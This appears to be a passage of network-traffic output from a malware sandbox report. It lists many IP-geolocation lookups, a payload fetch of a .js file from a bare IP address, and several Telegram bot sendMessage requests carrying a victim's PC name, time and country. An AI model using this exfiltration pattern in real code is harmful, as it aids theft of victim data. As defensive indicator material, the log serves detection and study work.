Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:30:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:40:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:10:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:29:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:01:17%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:21:05%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:30:54%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:59:31%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:39:43%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:39:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:09:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:39:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:20:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zoom/aus1.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
